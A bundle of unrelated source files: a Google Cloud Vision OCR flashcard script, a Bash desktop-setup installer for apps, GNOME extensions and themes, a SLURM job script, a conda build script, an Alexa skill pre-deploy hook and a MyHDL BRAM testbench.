}
<reponame>mdemong/hackathon-2019<filename>vision.js
// getCards('./bionotes5.jpg');
// Detects and prints labels for a hard-coded image via Google Cloud Vision.
// NOTE(review): this calls textDetection but reads labelAnnotations — these
// look mismatched (labelDetection populates labelAnnotations); confirm intent.
async function label() {
    // Imports the Google Cloud client library
    const vision = require('@google-cloud/vision');

    // Creates a client
    const client = new vision.ImageAnnotatorClient();

    // Performs label detection on the image file
    const [result] = await client.textDetection('./hackathon2.jpg');
    const labels = result.labelAnnotations;
    console.log('Labels:');
    labels.forEach(label => console.log(label.description));
}
/**
* From https://stackoverflow.com/a/14731922
*
* Conserve aspect ratio of the original region. Useful when shrinking/enlarging
* images to fit into a certain area.
*
* @param {Number} srcWidth width of source image
* @param {Number} srcHeight height of source image
* @param {Number} maxWidth maximum available width
* @param {Number} maxHeight maximum available height
* @return {Object} { width, height }
*/
function calculateAspectRatioFit(srcWidth, srcHeight, maxWidth, maxHeight) {
  // Scale by the limiting dimension so the result fits inside the box
  // while preserving the source aspect ratio.
  const ratio = Math.min(maxWidth / srcWidth, maxHeight / srcHeight);
  return { width: srcWidth * ratio, height: srcHeight * ratio };
}
// Runs Vision API text detection on a hard-coded image and prints the
// full detected text (the first annotation is the whole-image text).
async function text() {
    const vision = require('@google-cloud/vision');

    // Creates a client
    const client = new vision.ImageAnnotatorClient();
    const fileName = './hackathon2.jpg';

    // Performs text detection on the local file
    const [result] = await client.textDetection(fileName);
    const detections = result.textAnnotations;
    console.log('Text:');
    // detections.forEach(text => console.log(text));
    console.log(detections[0]['description']);
}
// OCRs a notes image via Google Cloud Vision and splits the recognized text
// into flashcards. Fronts are the text between a leading "-" and ":"; backs
// are the text between ":" and the next "-" (or end of text).
// Fixes: the write-only `paragraphs`/`lines` implicit globals (which leak to
// global scope and break under strict mode) were removed along with the
// dead commented-out paragraph-walking experiments.
async function getCards(fileName) {
    // Imports the Google Cloud client library
    const vision = require('@google-cloud/vision');

    // Creates a client
    const client = new vision.ImageAnnotatorClient();

    // Read a local image as a text document
    const [result] = await client.documentTextDetection(fileName);
    const fullTextAnnotation = result.fullTextAnnotation;
    console.log(`Full text:\n\n ${fullTextAnnotation.text}`);
    const fullText = fullTextAnnotation.text;

    // Getting fronts
    let frontRegex = /(?<=-).*(?=:)/g;
    let frontMatches = fullText.match(frontRegex);
    let finalCardList = new Array();
    for (const match of frontMatches) {
        // NOTE(review): replace(/\n/, " ") rewrites only the FIRST newline;
        // use /\n/g if multi-line fronts should be fully flattened — confirm.
        let frontText = match.trim().replace(/\n/, " ");
        finalCardList.push({front: frontText + ""});
    }

    // Getting backs
    let backRegex = /(?<=:)(.|\n)*?(?=-|$)/g
    let backMatches = fullText.match(backRegex);
    for (let i = 0; i < finalCardList.length; i++) {
        let backText = backMatches[i].trim().replace(/\n/, " ");
        finalCardList[i].back = backText;
    }

    console.log(JSON.stringify(finalCardList, undefined, 2));
    return finalCardList;
}
// NOTE(review): unimplemented stub — not exported and never called within the
// visible file; presumably intended to extract text from a paragraph object.
function getText(paragraph) {
}
module.exports = {getCards}; |
#!/bin/bash
# ---------------------------------------------------------------------------------------------------------------------
# Installs Android Studio via snap (classic confinement is required for IDEs).
# NOTE(review): the commented-out block below is the legacy manual install
# (tarball extraction plus a hand-written .desktop entry) kept for reference;
# the snap install at the bottom replaced it.
desktopAndroidStudio()
{
    # PACKAGE_URL="https://redirector.gvt1.com/edgedl/android/studio/ide-zips/4.1.1.0/android-studio-ide-201.6953283-linux.tar.gz"
    # PACKAGE_PATH="./packages/android-studio.deb"
    # startRun "Android Studio"
    # # Download the package installer if it was not pre-shipped with the script.
    # if [ ! -f "$PACKAGE_PATH" ]; then
    # wget $PACKAGE_URL -O $PACKAGE_PATH -q --show-progress
    # fi
    # # Install the package & it's dependencies.
    # sudo tar -xf $PACKAGE_PATH -C /opt
    # # Create a manual desktop icon for Android Studio.
    # cat > $HOME/.local/share/applications/android-studio.desktop <<EOL
    # [Desktop Entry]
    # Version=1.0
    # Type=Application
    # Name=Android Studio
    # Icon=/opt/android-studio/bin/studio.svg
    # Exec="/opt/android-studio/bin/studio.sh" %f
    # Comment=The Drive to Develop
    # Categories=Development;IDE;
    # Terminal=false
    # StartupWMClass=jetbrains-studio
    # Name[en_GB]=android-studio.desktop
    # ...
    # EOL
    # # Set path variable for Android Studio.
    # cp ./settings/.profile $HOME/.profile
    # endRun
    startRun "Android Studio"
    sudo snap install android-studio --classic
    endRun
}
# Installs Google Chrome from Google's APT repository.
desktopChrome()
{
    # Read the following to learn more:
    # https://www.itzgeek.com/how-tos/linux/debian/simple-way-to-install-google-chrome-on-debian-9.html
    startRun "Chrome"
    # Register the Google Chrome signing key in APT.
    # Bug fix: 'apt-key add' takes a single file argument ('-' for stdin);
    # the stray '-v' made apt-key try to read a key file literally named '-v'.
    # NOTE(review): apt-key is deprecated on current Debian/Ubuntu — newer
    # releases want the key dropped into /etc/apt/trusted.gpg.d/ instead;
    # confirm the target distro release.
    wget -q -O - https://dl.google.com/linux/linux_signing_key.pub | sudo apt-key add -
    echo deb http://dl.google.com/linux/chrome/deb/ stable main | sudo tee /etc/apt/sources.list.d/google-chrome.list
    # Refresh the APT package list.
    sudo apt-get -y update
    # Install the package.
    sudo apt-get -y install google-chrome-stable
    endRun
}
# Installs Discord via Flatpak (Flathub).
desktopDiscord()
{
    startRun "Discord"
    flatpak install -y flathub com.discordapp.Discord
    endRun
}
# Installs the Draw.io diagram editor via snap.
desktopDrawIO()
{
    startRun "Draw.io"
    sudo snap install drawio
    endRun
}
# Installs the GIMP image editor via snap.
desktopGIMP()
{
    startRun "GIMP"
    sudo snap install gimp
    endRun
}
# Installs the Inkscape vector editor via snap.
desktopInkscape()
{
    startRun "Inkscape"
    sudo snap install inkscape
    endRun
}
# Installs the Insomnia REST client via snap.
desktopInsomnia()
{
    startRun "Insomnia"
    sudo snap install insomnia
    endRun
}
# Installs the LibreOffice suite via snap.
desktopLibreOffice()
{
    startRun "Libre Office"
    sudo snap install libreoffice
    endRun
}
# Installs the Minecraft launcher from Mojang's .deb package.
desktopMinecraft()
{
    PACKAGE_URL="https://launcher.mojang.com/download/Minecraft.deb"
    PACKAGE_PATH="./packages/minecraft.deb"
    startRun "Minecraft"
    # Download the package installer if it was not pre-shipped with the script.
    if [ ! -f "$PACKAGE_PATH" ]; then
        # Robustness fix: quote the variable expansions so paths/URLs with
        # special characters survive word splitting.
        wget "$PACKAGE_URL" -O "$PACKAGE_PATH" -q --show-progress
    fi
    # Install the package & its dependencies (apt accepts a local .deb path).
    sudo apt-get -y install "$PACKAGE_PATH"
    endRun
}
# Installs MongoDB Compass from MongoDB's .deb package.
desktopMongoDBCompass()
{
    PACKAGE_URL="https://downloads.mongodb.com/compass/mongodb-compass_1.29.6_amd64.deb"
    PACKAGE_PATH="./packages/mongodb-compass.deb"
    startRun "MongoDB Compass"
    # Download the package installer if it was not pre-shipped with the script.
    if [ ! -f "$PACKAGE_PATH" ]; then
        # Robustness fix: quote the variable expansions so paths/URLs with
        # special characters survive word splitting.
        wget "$PACKAGE_URL" -O "$PACKAGE_PATH" -q --show-progress
    fi
    # Install the package & its dependencies (apt accepts a local .deb path).
    sudo apt-get -y install "$PACKAGE_PATH"
    endRun
}
# Installs the Peek GIF screen recorder via Flatpak (Flathub).
desktopPeek()
{
    startRun "Peek"
    flatpak install -y flathub com.uploadedlobster.peek
    endRun
}
# Installs the Pinta image editor via Flatpak (Flathub).
desktopPinta()
{
    startRun "Pinta"
    flatpak install -y flathub com.github.PintaProject.Pinta
    endRun
}
# Installs the Raspberry Pi Imager via Flatpak (Flathub).
desktopRaspberryPiImager()
{
    startRun "Raspberry Pi Imager"
    flatpak install -y flathub org.raspberrypi.rpi-imager
    endRun
}
# Installs the Snap Store front-end via snap.
desktopSnapStore()
{
    startRun "Snap Store"
    sudo snap install snap-store
    endRun
}
# Installs Steam from Valve's .deb package (requires i386 multi-arch support).
desktopSteam()
{
    # Read the following to learn more:
    # https://linuxconfig.org/how-to-install-steam-with-steam-play-on-debian-10-buster
    PACKAGE_URL="https://steamcdn-a.akamaihd.net/client/installer/steam.deb"
    PACKAGE_PATH="./packages/steam.deb"
    startRun "Steam"
    # Download the package installer if it was not pre-shipped with the script.
    if [ ! -f "$PACKAGE_PATH" ]; then
        # Robustness fix: quote the variable expansions so paths/URLs with
        # special characters survive word splitting.
        wget "$PACKAGE_URL" -O "$PACKAGE_PATH" -q --show-progress
    fi
    # Enable i386 packages (the Steam client is 32-bit).
    sudo dpkg --add-architecture i386
    # Refresh the APT package list.
    sudo apt-get -y update
    # Install 32-bit package dependencies.
    sudo apt-get -y install libc6-i386
    sudo apt-get -y install libgl1-mesa-dri:i386
    sudo apt-get -y install libgl1-mesa-glx:i386
    # Install the package & its dependencies (apt accepts a local .deb path).
    sudo apt-get -y install "$PACKAGE_PATH"
    endRun
}
# Installs Microsoft Teams via snap.
desktopTeams()
{
    startRun "Teams"
    sudo snap install teams
    endRun
}
# Installs the Vectr graphics editor via snap.
desktopVectr()
{
    startRun "Vectr"
    sudo snap install vectr
    endRun
}
# Installs Visual Studio Code via snap (classic confinement, required for IDEs).
desktopVSCode()
{
    startRun "VSCode"
    sudo snap install code --classic
    endRun
}
# ---------------------------------------------------------------------------------------------------------------------
# Installs Git from the distro's default APT repositories.
serviceGit()
{
    startRun "Git"
    sudo apt-get -y install git
    endRun
}
# Installs Node.js from the NodeSource APT repository.
serviceNode()
{
    # NOTE(review): node_17.x was a short-lived non-LTS release line — confirm
    # this is still the intended version before reuse.
    NODEREPO="node_17.x"
    # Distro codename (e.g. "focal"), used to pick the matching repo suite.
    DISTRO="$(lsb_release -s -c)"
    startRun "Node"
    # Register the Node source repositories in APT.
    # NOTE(review): apt-key is deprecated on current Debian/Ubuntu releases.
    wget -q -O - https://deb.nodesource.com/gpgkey/nodesource.gpg.key | sudo apt-key add -
    echo deb https://deb.nodesource.com/${NODEREPO} ${DISTRO} main | sudo tee /etc/apt/sources.list.d/nodesource.list
    echo deb-src https://deb.nodesource.com/${NODEREPO} ${DISTRO} main | sudo tee -a /etc/apt/sources.list.d/nodesource.list
    # Refresh the APT package list.
    sudo apt-get -y update
    # Install the package.
    sudo apt-get -y install nodejs
    endRun
}
# Installs the NordVPN client from NordVPN's APT repository.
serviceNordvpn()
{
    # Read the following to learn more:
    # https://support.nordvpn.com/Connectivity/Linux/1325531132/Installing-and-using-NordVPN-on-Debian-Ubuntu-and-Linux-Mint.htm
    startRun "NordVPN"
    # Register the NordVPN source repositories in APT.
    wget -q -O - https://repo.nordvpn.com/gpg/nordvpn_public.asc | sudo apt-key add -
    echo deb https://repo.nordvpn.com/deb/nordvpn/debian stable main | sudo tee /etc/apt/sources.list.d/nordvpn.list
    # Refresh the APT package list.
    sudo apt-get -y update
    # Install the package.
    sudo apt-get -y install nordvpn
    endRun
}
# ---------------------------------------------------------------------------------------------------------------------
# Installs, enables and configures the Dash to Panel Gnome shell extension.
extensionDashToPanel()
{
    # Download URL and on-disk path for the extension package.
    PACKAGE_URL="https://extensions.gnome.org/extension-data/dash-to-paneljderose9.github.com.v40.shell-extension.zip"
    PACKAGE_PATH="extensions/dash-to-panel.zip"
    startRun "Dash to Panel"
    # Download the package installer if it was not pre-shipped with the script.
    if [ ! -f "$PACKAGE_PATH" ]; then
        # Robustness fix: quote expansions so paths survive word splitting.
        wget "$PACKAGE_URL" -O "$PACKAGE_PATH" -q --show-progress
    fi
    # Look up the extension UUID from the package metadata.
    # (The variable name keeps the script-wide "EXTENSTION" spelling.)
    EXTENSTION_UUID=$(unzip -c "$PACKAGE_PATH" metadata.json | grep uuid | cut -d \" -f4)
    # Extract the extension into the user's Gnome shell extensions directory.
    mkdir -p "$HOME/.local/share/gnome-shell/extensions/$EXTENSTION_UUID"
    unzip -q -o "$PACKAGE_PATH" -d "$HOME/.local/share/gnome-shell/extensions/$EXTENSTION_UUID"
    # Enable the extension, or reload it if it is already enabled.
    # NOTE(review): gnome-shell-extension-tool was removed in GNOME 3.36+;
    # newer systems use 'gnome-extensions enable' — confirm the target distro.
    echo "$EXTENSTION_UUID"
    gnome-shell-extension-tool -e "$EXTENSTION_UUID" || gnome-shell-extension-tool -r "$EXTENSTION_UUID"
    # Load the extension configuration into DConf.
    cat ./settings/dash-to-panel.conf | dconf load /org/gnome/shell/extensions/dash-to-panel/
    endRun
}
# Installs, enables and configures the Arc Menu Gnome shell extension.
extensionArcMenu()
{
    # Download URL and on-disk path for the extension package.
    PACKAGE_URL="https://extensions.gnome.org/extension-data/arc-menulinxgem33.com.v49.shell-extension.zip"
    PACKAGE_PATH="extensions/arc-menu.zip"
    startRun "Arc Menu"
    # Download the package installer if it was not pre-shipped with the script.
    if [ ! -f "$PACKAGE_PATH" ]; then
        # Robustness fix: quote expansions so paths survive word splitting.
        wget "$PACKAGE_URL" -O "$PACKAGE_PATH" -q --show-progress
    fi
    # Look up the extension UUID from the package metadata.
    EXTENSTION_UUID=$(unzip -c "$PACKAGE_PATH" metadata.json | grep uuid | cut -d \" -f4)
    # Extract the extension into the user's Gnome shell extensions directory.
    mkdir -p "$HOME/.local/share/gnome-shell/extensions/$EXTENSTION_UUID"
    unzip -q -o "$PACKAGE_PATH" -d "$HOME/.local/share/gnome-shell/extensions/$EXTENSTION_UUID"
    # Enable the extension, or reload it if it is already enabled.
    gnome-shell-extension-tool -e "$EXTENSTION_UUID" || gnome-shell-extension-tool -r "$EXTENSTION_UUID"
    # Load the extension configuration into DConf.
    cat ./settings/arc-menu.conf | dconf load /org/gnome/shell/extensions/arc-menu/
    endRun
}
# Installs and enables the App Folders Gnome shell extension.
# (These five installers share one pattern: download zip, read the UUID from
# metadata.json, unzip into the user's extensions directory, enable/reload.
# Robustness fix applied throughout: quote all path expansions.)
extensionAppFolders()
{
    # Get the package ID and URL.
    PACKAGE_URL="https://extensions.gnome.org/extension-data/appfolders-managermaestroschan.fr.v16.shell-extension.zip"
    PACKAGE_PATH="extensions/app-folders.zip"
    startRun "App Folders"
    # Download the package installer if it was not pre-shipped with the script.
    if [ ! -f "$PACKAGE_PATH" ]; then
        wget "$PACKAGE_URL" -O "$PACKAGE_PATH" -q --show-progress
    fi
    # Look up the extension UUID from the package metadata.
    EXTENSTION_UUID=$(unzip -c "$PACKAGE_PATH" metadata.json | grep uuid | cut -d \" -f4)
    # Extract the extension into the user's Gnome shell extensions directory.
    mkdir -p "$HOME/.local/share/gnome-shell/extensions/$EXTENSTION_UUID"
    unzip -q -o "$PACKAGE_PATH" -d "$HOME/.local/share/gnome-shell/extensions/$EXTENSTION_UUID"
    # Enable the extension, or reload it if it is already enabled.
    gnome-shell-extension-tool -e "$EXTENSTION_UUID" || gnome-shell-extension-tool -r "$EXTENSTION_UUID"
    endRun
}
# Installs and enables the Start Overlay in Application View extension.
extensionStartOverlayInAppView()
{
    # Get the package ID and URL.
    PACKAGE_URL="https://extensions.gnome.org/extension-data/start-overlay-in-application-view%40cis.net.v2.shell-extension.zip"
    PACKAGE_PATH="extensions/start-overlay-in-app-view.zip"
    startRun "Start Overlay in App View"
    # Download the package installer if it was not pre-shipped with the script.
    if [ ! -f "$PACKAGE_PATH" ]; then
        wget "$PACKAGE_URL" -O "$PACKAGE_PATH" -q --show-progress
    fi
    # Look up the extension UUID from the package metadata.
    EXTENSTION_UUID=$(unzip -c "$PACKAGE_PATH" metadata.json | grep uuid | cut -d \" -f4)
    # Extract the extension into the user's Gnome shell extensions directory.
    mkdir -p "$HOME/.local/share/gnome-shell/extensions/$EXTENSTION_UUID"
    unzip -q -o "$PACKAGE_PATH" -d "$HOME/.local/share/gnome-shell/extensions/$EXTENSTION_UUID"
    # Enable the extension, or reload it if it is already enabled.
    gnome-shell-extension-tool -e "$EXTENSTION_UUID" || gnome-shell-extension-tool -r "$EXTENSTION_UUID"
    endRun
}
# Installs and enables the ESC to Close Overview extension.
extensionEscapeToCloseOverlay()
{
    # Get the package ID and URL.
    PACKAGE_URL="https://extensions.gnome.org/extension-data/ESC_to_close_overview%40daniel.badawi.me.v3.shell-extension.zip"
    PACKAGE_PATH="extensions/escape-to-close-overlay.zip"
    startRun "Escape to Close Overlay"
    # Download the package installer if it was not pre-shipped with the script.
    if [ ! -f "$PACKAGE_PATH" ]; then
        wget "$PACKAGE_URL" -O "$PACKAGE_PATH" -q --show-progress
    fi
    # Look up the extension UUID from the package metadata.
    EXTENSTION_UUID=$(unzip -c "$PACKAGE_PATH" metadata.json | grep uuid | cut -d \" -f4)
    # Extract the extension into the user's Gnome shell extensions directory.
    mkdir -p "$HOME/.local/share/gnome-shell/extensions/$EXTENSTION_UUID"
    unzip -q -o "$PACKAGE_PATH" -d "$HOME/.local/share/gnome-shell/extensions/$EXTENSTION_UUID"
    # Enable the extension, or reload it if it is already enabled.
    gnome-shell-extension-tool -e "$EXTENSTION_UUID" || gnome-shell-extension-tool -r "$EXTENSTION_UUID"
    endRun
}
# Installs and enables the Desktop Icons extension.
extensionShowDesktopIcons()
{
    # Get the package ID and URL.
    PACKAGE_URL="https://extensions.gnome.org/extension-data/desktop-iconscsoriano.v15.shell-extension.zip"
    PACKAGE_PATH="extensions/show-desktop-icons.zip"
    startRun "Show Desktop Icons"
    # Download the package installer if it was not pre-shipped with the script.
    if [ ! -f "$PACKAGE_PATH" ]; then
        wget "$PACKAGE_URL" -O "$PACKAGE_PATH" -q --show-progress
    fi
    # Look up the extension UUID from the package metadata.
    EXTENSTION_UUID=$(unzip -c "$PACKAGE_PATH" metadata.json | grep uuid | cut -d \" -f4)
    # Extract the extension into the user's Gnome shell extensions directory.
    mkdir -p "$HOME/.local/share/gnome-shell/extensions/$EXTENSTION_UUID"
    unzip -q -o "$PACKAGE_PATH" -d "$HOME/.local/share/gnome-shell/extensions/$EXTENSTION_UUID"
    # Enable the extension, or reload it if it is already enabled.
    gnome-shell-extension-tool -e "$EXTENSTION_UUID" || gnome-shell-extension-tool -r "$EXTENSTION_UUID"
    endRun
}
# Installs and enables the NordVPN Status indicator extension.
extensionNordvpnStatus()
{
    # Get the package ID and URL.
    PACKAGE_URL="https://extensions.gnome.org/extension-data/nordvpn_statusjcmartinez.dev.v7.shell-extension.zip"
    PACKAGE_PATH="extensions/nordvpn-status.zip"
    startRun "NordVPN Status"
    # Download the package installer if it was not pre-shipped with the script.
    if [ ! -f "$PACKAGE_PATH" ]; then
        wget "$PACKAGE_URL" -O "$PACKAGE_PATH" -q --show-progress
    fi
    # Look up the extension UUID from the package metadata.
    EXTENSTION_UUID=$(unzip -c "$PACKAGE_PATH" metadata.json | grep uuid | cut -d \" -f4)
    # Extract the extension into the user's Gnome shell extensions directory.
    mkdir -p "$HOME/.local/share/gnome-shell/extensions/$EXTENSTION_UUID"
    unzip -q -o "$PACKAGE_PATH" -d "$HOME/.local/share/gnome-shell/extensions/$EXTENSTION_UUID"
    # Enable the extension, or reload it if it is already enabled.
    gnome-shell-extension-tool -e "$EXTENSTION_UUID" || gnome-shell-extension-tool -r "$EXTENSTION_UUID"
    endRun
}
# ---------------------------------------------------------------------------------------------------------------------
# Downloads, installs and activates the Vimix GTK theme.
themeVimix()
{
    # Get the package ID and URL.
    PACKAGE_ID="vimix-gtk-themes"
    PACKAGE_VERSION="2020-02-24"
    ACTIVE_SET="vimix-doder"
    PACKAGE_URL="https://codeload.github.com/vinceliuice/$PACKAGE_ID/zip/$PACKAGE_VERSION"
    PACKAGE_PATH="themes/$PACKAGE_ID.zip"
    startRun "Vimix"
    # Download the package installer if it was not pre-shipped with the script.
    if [ ! -f "$PACKAGE_PATH" ]; then
        # Robustness fix: quote expansions so paths survive word splitting.
        wget "$PACKAGE_URL" -O "$PACKAGE_PATH" -q --show-progress
    fi
    # Extract the theme package.
    unzip -q -o "$PACKAGE_PATH" -d "themes/$PACKAGE_ID"
    # Install the theme package (upstream install script).
    "./themes/$PACKAGE_ID/$PACKAGE_ID-$PACKAGE_VERSION/install.sh"
    # Activate the theme.
    gsettings set org.gnome.desktop.interface gtk-theme "$ACTIVE_SET"
    # Remove the extracted source folder.
    rm -r "themes/$PACKAGE_ID"
    endRun
}
# ---------------------------------------------------------------------------------------------------------------------
# Downloads, installs and activates the Papirus icon theme.
iconsPapirus()
{
    # Get the package ID and URL.
    PACKAGE_ID="papirus-icon-theme"
    PACKAGE_VERSION="20200405"
    ACTIVE_SET="Papirus"
    PACKAGE_URL="https://codeload.github.com/PapirusDevelopmentTeam/$PACKAGE_ID/zip/$PACKAGE_VERSION"
    PACKAGE_PATH="icons/$PACKAGE_ID.zip"
    startRun "Papirus"
    # Download the package installer if it was not pre-shipped with the script.
    if [ ! -f "$PACKAGE_PATH" ]; then
        # Robustness fix: quote expansions so paths survive word splitting.
        wget "$PACKAGE_URL" -O "$PACKAGE_PATH" -q --show-progress
    fi
    # Extract the icons package.
    unzip -q -o "$PACKAGE_PATH" -d "icons/$PACKAGE_ID"
    # Install the icons package (upstream install script).
    "./icons/$PACKAGE_ID/$PACKAGE_ID-$PACKAGE_VERSION/install.sh"
    # Activate the icon set.
    gsettings set org.gnome.desktop.interface icon-theme "$ACTIVE_SET"
    # Remove the extracted source folder.
    rm -r "icons/$PACKAGE_ID"
    endRun
}
# ---------------------------------------------------------------------------------------------------------------------
# NOTE(review): themeVimix and iconsPapirus below are EXACT duplicates of the
# definitions earlier in this script. In bash the later definition wins, so
# these are the effective ones — consider deleting one pair.
themeVimix()
{
    # Get the package ID and URL.
    PACKAGE_ID="vimix-gtk-themes"
    PACKAGE_VERSION="2020-02-24"
    ACTIVE_SET="vimix-doder"
    PACKAGE_URL="https://codeload.github.com/vinceliuice/$PACKAGE_ID/zip/$PACKAGE_VERSION"
    PACKAGE_PATH="themes/$PACKAGE_ID.zip"
    startRun "Vimix"
    # Download the package installer if it was not pre-shipped with the script.
    if [ ! -f "$PACKAGE_PATH" ]; then
        # Robustness fix: quote expansions so paths survive word splitting.
        wget "$PACKAGE_URL" -O "$PACKAGE_PATH" -q --show-progress
    fi
    # Extract the theme package.
    unzip -q -o "$PACKAGE_PATH" -d "themes/$PACKAGE_ID"
    # Install the theme package (upstream install script).
    "./themes/$PACKAGE_ID/$PACKAGE_ID-$PACKAGE_VERSION/install.sh"
    # Activate the theme.
    gsettings set org.gnome.desktop.interface gtk-theme "$ACTIVE_SET"
    # Remove the extracted source folder.
    rm -r "themes/$PACKAGE_ID"
    endRun
}
# ---------------------------------------------------------------------------------------------------------------------
iconsPapirus()
{
    # Get the package ID and URL.
    PACKAGE_ID="papirus-icon-theme"
    PACKAGE_VERSION="20200405"
    ACTIVE_SET="Papirus"
    PACKAGE_URL="https://codeload.github.com/PapirusDevelopmentTeam/$PACKAGE_ID/zip/$PACKAGE_VERSION"
    PACKAGE_PATH="icons/$PACKAGE_ID.zip"
    startRun "Papirus"
    # Download the package installer if it was not pre-shipped with the script.
    if [ ! -f "$PACKAGE_PATH" ]; then
        # Robustness fix: quote expansions so paths survive word splitting.
        wget "$PACKAGE_URL" -O "$PACKAGE_PATH" -q --show-progress
    fi
    # Extract the icons package.
    unzip -q -o "$PACKAGE_PATH" -d "icons/$PACKAGE_ID"
    # Install the icons package (upstream install script).
    "./icons/$PACKAGE_ID/$PACKAGE_ID-$PACKAGE_VERSION/install.sh"
    # Activate the icon set.
    gsettings set org.gnome.desktop.interface icon-theme "$ACTIVE_SET"
    # Remove the extracted source folder.
    rm -r "icons/$PACKAGE_ID"
    endRun
}
#!/bin/bash
# SLURM batch script: runs one configuration of meta.py (activation function
# experiment "cosper", Adagrad optimizer) on a single core. The #SBATCH lines
# below are scheduler directives, not ordinary comments.
#SBATCH -J Act_cosper_1
#SBATCH --mail-user=eger@ukp.informatik.tu-darmstadt.de
#SBATCH --mail-type=FAIL
#SBATCH -e /work/scratch/se55gyhe/log/output.err.%j
#SBATCH -o /work/scratch/se55gyhe/log/output.out.%j
#SBATCH -n 1 # Number of cores
#SBATCH --mem-per-cpu=2000
#SBATCH -t 23:59:00 # Hours, minutes and seconds, or '#SBATCH -t 10' -only mins
#module load intel python/3.5
# Positional args are hyper-parameters consumed by meta.py (activation, seed,
# optimizer, etc.) — see meta.py for their meaning.
python3 /home/se55gyhe/Act_func/progs/meta.py cosper 1 Adagrad 2 0.32948285423491797 78 0.008843421161991835 rnormal PE-infersent 0.01
|
#!/bin/bash
# conda-build build script for the R 'argparser' package: build from source on
# the platforms listed, otherwise fall back to copying a pre-built library.
if [[ $target_platform =~ linux.* ]] || [[ $target_platform == win-32 ]] || [[ $target_platform == win-64 ]] || [[ $target_platform == osx-64 ]]; then
    export DISABLE_AUTOBREW=1
    # Strip the 'Priority:' field from DESCRIPTION (R CMD check rejects it).
    mv DESCRIPTION DESCRIPTION.old
    grep -v '^Priority: ' DESCRIPTION.old > DESCRIPTION
    $R CMD INSTALL --build .
else
    mkdir -p $PREFIX/lib/R/library/argparser
    mv * $PREFIX/lib/R/library/argparser
fi
|
#!/bin/bash
# Shell script for ask-cli pre-deploy hook for Python
# Script Usage: pre_deploy_hook.sh <SKILL_NAME> <DO_DEBUG> <TARGET>
# SKILL_NAME is the preformatted name passed from the CLI, after removing special characters.
# DO_DEBUG is boolean value for debug logging
# TARGET is the deploy TARGET provided to the CLI. (eg: all, skill, lambda etc.)
# Run this script under skill root folder
# The script does the following:
# - Create a temporary 'lambda_upload' directories under each SOURCE_DIR folder
# - Copy the contents of '<SKILL_NAME>/SOURCE_DIR' folder into '<SKILL_NAME>/SOURCE_DIR/lambda_upload'
# - Copy the contents of site packages in $VIRTUALENV created in <SKILL_NAME>/.venv/ folder
# - Update the location of this 'lambda_upload' folder to skill.json for zip and upload
SKILL_NAME=$1
DO_DEBUG=${2:-false}
TARGET=${3:-"all"}
SKILL_ENV_NAME="skill_env"
# Unless debugging, silence ALL stdout/stderr for the rest of the script.
if ! $DO_DEBUG ; then
    exec > /dev/null 2>&1
fi
echo "###########################"
echo "##### pre-deploy hook #####"
echo "###########################"
if [[ $TARGET == "all" || $TARGET == "lambda" ]]; then
    # Extract every "sourceDir" value from skill.json (crude JSON parsing via
    # grep/cut/sed — assumes one key per line and no ':' in the path).
    grep "sourceDir" ./skill.json | cut -d: -f2 | sed 's/"//g' | sed 's/,//g' | while read -r SOURCE_DIR; do
        # Step 1: Decide source path and upload path
        if [[ $SOURCE_DIR == */lambda_upload ]]; then
            ADJUSTED_SOURCE_DIR=${SOURCE_DIR%"/lambda_upload"}
            UPLOAD_DIR=$SOURCE_DIR
        else
            ADJUSTED_SOURCE_DIR=$SOURCE_DIR
            UPLOAD_DIR="$SOURCE_DIR/lambda_upload"
        fi
        # Step 2: Create empty lambda_upload folder
        echo "Checking for lambda_upload folder existence in sourceDir $ADJUSTED_SOURCE_DIR"
        rm -rf $UPLOAD_DIR
        mkdir $UPLOAD_DIR
        # Step 3: Copy source code in sourceDir to lambda_upload
        echo "Copying source code in $SKILL_NAME/$ADJUSTED_SOURCE_DIR folder to $SKILL_NAME/$UPLOAD_DIR"
        rsync -avzq --exclude '*lambda_upload' $ADJUSTED_SOURCE_DIR/* $UPLOAD_DIR
        # Step 4: Find virtual environment site packages, copy contents to lambda_upload
        echo "Copying dependencies installed in $SKILL_NAME/.venv/$SKILL_ENV_NAME to $SKILL_NAME/$UPLOAD_DIR"
        SITE=$(.venv/$SKILL_ENV_NAME/bin/python -c 'from distutils.sysconfig import get_python_lib; print(get_python_lib())')
        cp -r $SITE/* $UPLOAD_DIR
        # Step 5: Update the "manifest.apis.custom.endpoint.sourceDir" value in skill.json if necessary
        if ! [[ $SOURCE_DIR == */lambda_upload ]]; then
            echo "Updating sourceDir to point to lambda_upload folder in skill.json"
            RAW_SOURCE_DIR_LINE="\"sourceDir\": \"$SOURCE_DIR\""
            NEW_SOURCE_DIR_LINE="\"sourceDir\": \"$UPLOAD_DIR\""
            # NOTE(review): GNU sed parses '-in' as in-place editing with the
            # backup suffix "n" (creates skill.jsonn) — confirm '-i' alone was
            # not the intent.
            sed -in "s#$RAW_SOURCE_DIR_LINE#$NEW_SOURCE_DIR_LINE#g" ./skill.json
        fi
    done
    echo "###########################"
fi
exit 0
|
<gh_stars>0
from myhdl import *
from tope import *
from bram import *
from ClkDriver import *
from ResetDriver import *
import random
@block
def tbTope():
    """MyHDL testbench: wires a BRAM instance to the 'tope' top-level DUT.

    Prompts interactively for the RAM address width, builds the shared
    signals, and returns all instantiated generators for simulation.
    """
    # Number of address bits for the RAM, asked interactively.
    A_WIDTH = int(input("lineas del simulacion.hex/ Cantidad de bits del addr de la RAM: "))
    clk = Signal(False)
    DataInRAM = Signal(modbv(0)[32:])
    # Bug fix: 'async' became a reserved keyword in Python 3.7, making
    # 'ResetSignal(..., async=True)' a SyntaxError; MyHDL >= 0.10 renamed the
    # parameter to 'isasync'.
    reset = ResetSignal(0, active=1, isasync=True)
    Address = Signal(modbv(0)[A_WIDTH:])
    WR = Signal(modbv(0)[4:])
    WE = Signal(False)
    RE = Signal(False)
    DataOutRAM = Signal(modbv(0)[32:])
    Done = Signal(False)
    clkinst = ClkDriver(clk)
    # resetinst = ResetDriver(reset)
    braminst = BRAM(clk, Address, DataInRAM, WR, WE, RE, DataOutRAM, Done, A_WIDTH)  # hex
    topeinst = tope(clk, reset, DataOutRAM, Done, Address, DataInRAM, WR, WE, RE)
    interv = delay(7)  # NOTE(review): unused — presumably a leftover; confirm before removing.
    return instances()
# Elaborate the testbench, enable VCD waveform tracing, and simulate 1000 steps.
test = tbTope()
test.config_sim(trace=True)
test.run_sim(1000)
|
#! /usr/bin/env bash
# Installs Emacs 24 with its elisp sources and non-DFSG docs.
# NOTE(review): the emacs24* packages only exist on older Debian/Ubuntu
# releases — confirm the target distro still ships them.
